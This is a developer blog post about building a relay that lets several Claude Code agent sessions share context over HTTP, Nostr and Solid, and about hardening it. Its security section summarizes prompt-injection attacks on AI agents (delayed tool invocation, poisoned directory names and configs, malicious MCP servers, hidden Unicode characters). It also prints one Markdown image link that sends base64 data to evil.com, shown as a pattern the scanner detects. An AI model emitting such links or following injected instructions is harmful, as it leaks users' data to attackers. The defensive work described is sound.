Building a Decentralized AI Fortress in One Session

claude-codeagentsarchitecturesecurityrelaynostrsolid-protocoldecentralization

Building a Decentralized AI Fortress in One Session

One session. 30+ agents. 15,000+ lines shipped. Three decentralized protocols wired together. A security threat model informed by actual conference research. And a dashboard redesign from scratch.

This is what happens when you let agent swarms loose on infrastructure that matters.

What is claude-relay?

It’s an inter-Claude knowledge relay — a server that lets multiple Claude Code sessions (or humans + AI agents) share context in real time. Think Google Docs meets Signal meets Nostr, but the participants are AI agents collaborating on code.

Before today, it had HTTP REST + a basic dashboard. After today:

HTTP REST ←→ Relay Core ←→ Nostr WebSocket

            Solid Pods (JSON-LD)

              SQLite (WAL)

Three protocols. Bidirectional bridges. Federated identity. And a content scanner that strips Unicode steganography.

The Swarm Sprint

Sprint 2: 4 Teams, 12 Tasks

I split the work into 4 parallel agent teams, each running in an isolated git worktree:

TeamWhat they built
PersistenceSQLite store (WAL mode), atomic writes, dedup index
SecurityContent scanner on all routes, rate limiter fix, timing-safe tokens
NetworkRelay pool HTTP endpoints, SSE catch-up, WS heartbeat, reconnect jitter
DashboardSession export (JSON/Markdown), participant identity badges

All 4 delivered. I merged, resolved conflicts, and ran the test suite: 28/28 HTTP tests + 25/25 Nostr E2E tests. The Nostr tests do full NIP-42 auth — generate keypairs, connect via WebSocket, authenticate with Schnorr signatures, publish events, verify broadcast, test the bridge.

Then a code review loop: audit agent found 10 issues, fix agents patched 4 (rate limiter memory leak, nostrPubkeys not loading from SQLite, O(n) subscriber scan, missing Map init). Re-audited down to 1 LOW remaining.

Solid Protocol: Levels 1-3

Tim Berners-Lee’s Solid Protocol gives users data sovereignty through personal data pods. I integrated it at three levels:

Level 1 — Pod Export (shipped + E2E tested)

POST /solid/:session_id/export serializes a relay session as JSON-LD and writes it to a Solid Pod. Each message becomes a separate resource with full RDF typing. Tested against a live Community Solid Server — the audit agent found and fixed 6 issues including a Bun crypto incompatibility with DPoP tokens.

Level 2 — Write-Through Storage (built)

SQLite stays as L1 cache (<1ms reads). A background sync engine drains a write queue to the Pod. Messages are written as they arrive — no after-the-fact export needed. Schema migrations, retry with exponential backoff, catch-up on restart.

Level 3 — Federated Bridge (PoC built)

The triple bridge: HTTP ↔ Nostr ↔ Solid. Messages flow between all three protocols. Each participant gets three identities — Bearer token, Nostr pubkey, WebID — bound together. A Pod notification pool watches for changes from other relays. Three-way dedup prevents loops.

Apple HIG Dashboard Redesign

Threw out the old dashboard and rebuilt from scratch. Dark mode first, frosted glass (backdrop-filter: blur(20px)), SF Pro typography, 4-color participant system, responsive down to mobile. The design doc is 3,400 lines with complete CSS custom properties, component specs, and interaction patterns.

The Security Awakening

This is where it got real. I loaded 11 talks from the [un]prompted 2026 conference into Google NotebookLM and asked it specific questions about claude-relay’s attack surface.

The answers were sobering:

“When an agent automatically processes untrusted external data, it can be exploited instantly without any user interaction.”

Critical finding: The Nostr bridge and Solid bridge were injecting messages into sessions without running the content scanner. Two of three ingestion protocols were completely unprotected.

Johann Rehberger’s “delayed tool invocation” attack: a payload sits dormant in agent memory until a trigger activates it, turning the agent into promptware — a zombie on a prompt-based C2 server.

Nicholas Carlini’s research: models can autonomously write their own exploits. Blind SQL injection. Heap buffer overflows. No human hand-holding.

Piotr Ryciak’s 25 vulnerability patterns for AI IDEs: prompt injection via directory names, time-delayed config poisoning, malicious MCP server initializations. Our relay registers 10 MCP tools. Every pattern applies.

What We Hardened

The threat model became a sprint. Three agent teams in parallel:

Unicode Steganography Detection — Strips 13 classes of invisible characters (zero-width joiners, Tags block U+E0000, Hangul fillers, soft hyphens). Detects bidirectional text overrides (the CVE-2021-42574 class). These characters are invisible to humans and regex but fully readable by LLMs.

Scanner Normalization — Before running regex, the scanner now normalizes fullwidth Unicode to ASCII, decodes leet speak (sk → sk, $ → s, @ → a), and detects Markdown image exfiltration (![img](https://evil.com/Q=[base64_data])).

Bridge Scanning — Content scanner now runs on ALL three protocols: HTTP POST, Nostr EVENT bridge, Solid Pod bridge. Every message gets scanned regardless of how it enters the relay.

MCP Approval Fixrelay_share_workspace was calling sendMessage() directly, bypassing the approval queue entirely. File trees and README contents could be exfiltrated without consent. Fixed: everything routes through approval now.

Credential Secure Delete — nsec private keys stored in active-sessions.json now get 3-pass random overwrite before deletion.

The Philosophy

No central authority owns the relay.
No central authority owns the data.
No central authority owns the identities.

Nostr gives censorship-resistant transport — events propagate through a gossip network of relays. Solid gives data ownership — your Pod, your rules, your ACLs. The relay is the neutral bridge between protocols that serve different purposes but share the same values.

The security standard isn’t “good enough.” It’s Signal-level. When autonomous AI agents collaborate through your infrastructure, the attack surface isn’t just network packets — it’s language itself. Unicode steganography. Prompt injection. Delayed payload activation. The content scanner has to be adversarial-aware, not just pattern-matching.

By the Numbers

Agents spawned:     30+
Lines shipped:      15,000+
Test pass rate:     53/53 (28 HTTP + 25 Nostr)
Architecture docs:  6 documents, ~11,000 lines
Security threats:   8 modeled, 5 P0 patched
MCP tools:          10
Protocols bridged:  3 (HTTP + Nostr + Solid)
Builds passing:     All packages clean

What’s Next

The P1 security tasks: Dual LLM pattern for content inspection (use a lightweight model to classify content as safe/suspicious), federation allowlists (deny-by-default for external Nostr relays and Solid Pods), canary tokens (inject decoy API keys — if they appear externally, you’re compromised).

And eventually: end-to-end encryption for relayed messages. Because if we’re building infrastructure for sovereign AI collaboration, the relay itself shouldn’t be able to read the content.

Onward.